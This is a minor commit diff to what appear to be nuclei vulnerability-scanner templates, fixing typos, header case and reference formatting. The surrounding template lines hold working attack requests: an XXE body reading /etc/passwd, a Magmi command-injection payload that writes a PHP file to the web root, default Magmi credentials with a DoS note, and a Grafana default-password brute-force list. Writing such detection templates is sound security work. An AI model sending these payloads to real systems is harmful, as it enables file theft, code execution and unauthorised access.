Misc (minor)

Related nuclei tickets:
* #259 - dynamic key-value field support for template information
* #940 - new infos in template
* #834
* RES-84
patch-1
forgedhallpass 2021-08-19 17:25:01 +03:00
parent 002e8db616
commit 2a320412bf
8 changed files with 13 additions and 12 deletions

View File

@ -53,7 +53,7 @@ git checkout -b template_branch_name
git add . git add .
``` ```
- To commit give a descriptive message for the convenience of reveiwer by: - To commit, give a descriptive message for the convenience of the reviewer by:
```sh ```sh
# This message get associated with all files you have changed # This message get associated with all files you have changed

View File

@ -6,8 +6,9 @@ info:
severity: medium severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
tags: cve,cve2017,magmi,xss tags: cve,cve2017,magmi,xss
reference: https://github.com/dweeves/magmi-git/issues/522 reference:
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip - https://github.com/dweeves/magmi-git/issues/522
- https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
requests: requests:
- method: GET - method: GET

View File

@ -14,7 +14,7 @@ requests:
path: path:
- "{{BaseURL}}/v2/api/product/manger/getInfo" - "{{BaseURL}}/v2/api/product/manger/getInfo"
headers: headers:
Content-type: "text/xml" Content-Type: "text/xml"
body: | body: |
<!--?xml version="1.0" ?--> <!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>

View File

@ -19,7 +19,7 @@ requests:
Accept-Encoding: gzip, deflate Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1 X-Prototype-Version: 1.5.1.1
Content-type: application/json; charset=UTF-8 Content-Type: application/json; charset=UTF-8
Origin: {{BaseURL}} Origin: {{BaseURL}}
Connection: close Connection: close
Referer: {{BaseURL}} Referer: {{BaseURL}}

View File

@ -17,14 +17,14 @@ requests:
- | - |
POST /magmi/web/magmi_saveprofile.php HTTP/1.1 POST /magmi/web/magmi_saveprofile.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Connection: close Connection: close
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses= profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
- | - |
POST /magmi/web/magmi_run.php HTTP/1.1 POST /magmi/web/magmi_run.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Connection: close Connection: close
engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update

View File

@ -10,7 +10,7 @@ info:
# Response code 503 indicates a potential successful "Too many connections" error # Response code 503 indicates a potential successful "Too many connections" error
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
# whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
# Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100 # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
requests: requests:

View File

@ -23,8 +23,7 @@ requests:
- prom-operator - prom-operator
- admin - admin
# Added default grafana and prometheus user. # Added default grafana and prometheus user. reference[2]
# Source: https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
attack: sniper attack: sniper

View File

@ -5,6 +5,8 @@ info:
author: TechbrunchFR author: TechbrunchFR
severity: info severity: info
description: Identify Magento description: Identify Magento
reference:
- https://devdocs.magento.com/guides/v2.4/graphql/
tags: magento tags: magento
requests: requests:
@ -14,8 +16,7 @@ requests:
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}' - '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when # There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
# consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check # consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1]
# https://devdocs.magento.com/guides/v2.4/graphql/
matchers-condition: or matchers-condition: or
matchers: matchers: